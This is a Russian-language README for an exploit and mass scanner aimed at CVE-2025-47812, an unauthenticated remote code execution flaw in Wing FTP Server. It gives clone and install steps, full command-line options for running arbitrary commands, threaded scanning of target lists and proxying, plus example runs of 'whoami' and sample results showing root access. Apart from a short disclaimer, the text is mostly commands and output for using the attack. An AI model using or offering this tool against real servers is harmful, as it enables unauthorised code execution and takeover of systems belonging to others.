
Эксплойт и сканер для CVE-2025-47812, нацеленный на неаутентифицированное удалённое выполнение кода в Wing FTP Server, с поддержкой одиночных целей, массового сканирования, прокси и нескольких форматов вывода.
Улучшенный эксплойт для Wing FTP Server CVE-2025-47812 - неаутентифицированное удаленное выполнение кода (RCE)
Клонируйте этот репозиторий и перейдите в директорию:
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt
Или просто скачайте скрипт CVE-2025-47812.py и запустите его.
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]
Эксплойт для Wing FTP Server CVE-2025-47812 - улучшенная версия
опции:
-h, --help показать это сообщение
-u URL, --url URL целевой URL (напр. http://192.168.1.100:5466)
-f FILE, --file FILE файл со списком URL (по одному на строку)
-c COMMAND, --command COMMAND
команда для выполнения (по умолчанию: echo CVE-2025-47812)
-U USERNAME, --username USERNAME
имя пользователя (по умолчанию: anonymous)
-P PASSWORD, --password PASSWORD
пароль (по умолчанию: пусто)
--check режим проверки: только выяснить, уязвим ли (использует безвредную команду)
-v, --verbose подробный режим (показывает детали)
--proxy PROXY прокси (напр. http://127.0.0.1:8080)
--timeout TIMEOUT таймаут в секундах (по умолчанию: 10)
-o OUTPUT, --output OUTPUT
выходной файл для сохранения результатов
--output-format {txt,json,csv}
формат вывода (по умолчанию: txt)
--threads THREADS количество потоков для сканирования нескольких целей (по умолчанию: 5)
--no-progress скрыть индикатор прогресса
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v
Файл должен содержать по одному URL на строку, например:
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.myserver.com:5466
http://192.168.1.10:5466 - УЯЗВИМ - пользователь: root
http://192.168.1.11:5466 - БЕЗОПАСНО - Не уязвим
[
{
"target": "http://192.168.1.10:5466",
"vulnerable": true,
"info": "пользователь: root"
}
]
Target,Vulnerable,Info
http://192.168.1.10:5466,True,пользователь: root
Этот эксплойт предназначен исключительно для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование данного инструмента против систем без явного согласия является незаконным и может повлечь серьезные юридические последствия. Авторы не несут ответственности за любое неправомерное использование.
Если вам нравится эта работа, не забудьте поставить звезду ⭐ на GitHub!
Этот проект лицензирован по лицензии MIT – подробности в файле LICENSE.